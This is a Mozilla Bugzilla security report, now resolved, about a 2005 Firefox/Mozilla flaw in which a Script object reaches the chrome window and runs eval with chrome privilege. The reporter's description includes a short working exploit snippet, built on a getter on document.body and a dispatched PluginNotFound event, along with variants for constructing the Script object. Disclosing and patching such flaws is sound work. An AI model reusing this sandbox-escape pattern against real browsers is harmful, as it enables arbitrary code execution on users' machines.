new Script() can access chrome window and run arbitrary code with chrome privilege

RESOLVED FIXED

Status

()

Core
Security
RESOLVED FIXED
13 years ago
11 years ago

People

(Reporter: moz_bug_r_a4, Assigned: brendan)

Tracking

({fixed-aviary1.0.4, fixed1.7.8})

Trunk
x86
Windows XP
fixed-aviary1.0.4, fixed1.7.8
Points:
---
Dependency tree / graph
Bug Flags:
blocking1.7.8 +
blocking-aviary1.0.4 +
in-testsuite ?

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:fix] trunk version rolled into 281988)

Attachments

(4 attachments)

(Reporter)

Description

13 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

Firefox 1.0.3:
missingPluginInstaller.prototype.newMissingPlugin (in browser.js) is another
event handler that can be used to make chrome access non-DOM JS property
(related to Bug 289961).

Mozilla 1.7.7:
hrefForClickEvent (in contentAreaClick.js) is the function that can be used to
make chrome access non-DOM JS property (related to Bug 290324).

There is the way to circumvent the fix represented in bug 289074 comment 79. The
code in Script object can access |arguments.callee.__parent__| that is the
chrome window, and |arguments.callee.__parent__.eval()| is executed with chrome
privilege.

Exploit:

  var scriptCode = "arguments.callee.__parent__.eval('" + MALICIOUS_CODE + "');'';";

  var script = (function() {
    function x() { new Object(); }
    return new Script(scriptCode);
  })();

  document.body.__defineGetter__("type", script);
  var event = document.createEvent("Events");
  event.initEvent("PluginNotFound", true, true);
  document.body.dispatchEvent(event);

note:
It is important that how to create Script object. A, B, and C cause this error:
"Error: arguments is not defined". I don't know why D can access |arguments|.

A)
  var script = new Script(scriptCode);

B)
  var script = (function() {
    return new Script(scriptCode);
  })();

C)
  var script = (function() {
    function x() { "a"; }
    return new Script(scriptCode);
  })();

D)
  // any Object (window, document, new Array(), ...)
  var anyObj = new Object();
  var script = (function() {
    function x() { anyObj; }
    return new Script(scriptCode);
  })();


I have confirmed that the following testcases work in:
[Firefox]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Firefox/1.0.3
[Mozilla Suite]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414


Reproducible: Always

Steps to Reproduce:
(Reporter)

Comment 1

13 years ago
Created attachment 181108 [details]
testcase 1

for Firefox/1.0.3
(Reporter)

Comment 2

13 years ago
Created attachment 181110 [details]
testcase 2

for Mozilla/1.7.7
(Reporter)

Comment 3

13 years ago
Created attachment 181111 [details]
testcase 3

each of the ways to create Script object
(Assignee)

Comment 4

13 years ago
Testcase 1 is quite clever.  Another bounty for moz_bug_r_a4!

The patch in bug 290324 stops testcase 2.

Testcase 3 merely shows how to get an outer function invocation to have an
activation (Call in SpiderMonkey) object: nest an inner function that uses a
non-local identifier.

/be
Assignee: dveditz → brendan
Status: UNCONFIRMED → NEW
Ever confirmed: true
(In reply to comment #4)
> The patch in bug 290324 stops testcase 2.

No, it's the suite version of testcase 1.
(Assignee)

Comment 6

13 years ago
Er, dbaron points out that testcase 2 is for the suite.  It's the suite version
of testcase 1, I guess.

More tomorrow.  Thanks again, moz_bug_r_a4.

/be
Status: NEW → ASSIGNED
Blocks: 256195
Flags: blocking-aviary1.1+
Flags: blocking-aviary1.0.4+
Whiteboard: [sg:fix]
the more js can interact with chrome, the more exploits.

especially if chrome executes js.
(Assignee)

Comment 8

13 years ago
Created attachment 181234 [details] [diff] [review]
fix
Attachment #181234 - Flags: superreview?(dbaron)
Attachment #181234 - Flags: review?(jst)
Attachment #181234 - Flags: approval1.7.8?
Attachment #181234 - Flags: approval-aviary1.0.4?
(Assignee)

Comment 9

13 years ago
Comment on attachment 181234 [details] [diff] [review]
fix

jst, feel free to review too.

/be
Attachment #181234 - Flags: review?(jst) → review?(shaver)
Comment on attachment 181234 [details] [diff] [review]
fix

r=shaver
Attachment #181234 - Flags: review?(shaver) → review+
(Assignee)

Comment 11

13 years ago
Thanks to bz for some productive discussion, part of which suggested this patch.

/be
Comment on attachment 181234 [details] [diff] [review]
fix

I really don't understand this anymore, but sr=dbaron.
Attachment #181234 - Flags: superreview?(dbaron) → superreview+
Flags: blocking1.8b2+
Flags: blocking1.7.8+
Depends on: 281988
Whiteboard: [sg:fix] → [sg:fix] trunk version rolled into 281988

Updated

13 years ago
Flags: blocking1.8b2+
Flags: blocking-aviary1.1+
(Assignee)

Comment 13

12 years ago
Comment on attachment 181234 [details] [diff] [review]
fix

Got dveditz and drivers approval on IRC.  Checking in, with the same change to
obj_eval (indirect call error).

/be
Attachment #181234 - Flags: approval1.7.8?
Attachment #181234 - Flags: approval1.7.8+
Attachment #181234 - Flags: approval-aviary1.0.4?
Attachment #181234 - Flags: approval-aviary1.0.4+
(Assignee)

Comment 14

12 years ago
Checked into branches.

/be
Status: ASSIGNED → RESOLVED
Last Resolved: 12 years ago
Resolution: --- → FIXED

Updated

12 years ago
Flags: blocking-aviary1.0.5+ → blocking-aviary1.0.4+

Updated

12 years ago
Attachment #181234 - Flags: approval-aviary1.0.5+ → approval-aviary1.0.4+
other than the attached test cases, are there other areas or things we could
test to ensure that this didn't regress anything? thanks!

Comment 16

12 years ago
In Firefox 1.0.4/winxp, I am getting the following for testcase 3:

A)
ReferenceError: arguments is not defined

B)
ReferenceError: arguments is not defined

C)
ReferenceError: arguments is not defined

D)
[object Object]

was D) supposed to be fixed?
Keywords: fixed-aviary1.0.4, fixed1.7.8
Clearing security flag from announced vulnerabilities fixed in Firefox
1.0.4/Mozilla 1.7.8
Group: security
Blocks: 256197
No longer blocks: 256195

Updated

12 years ago
Flags: testcase+

Updated

11 years ago
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.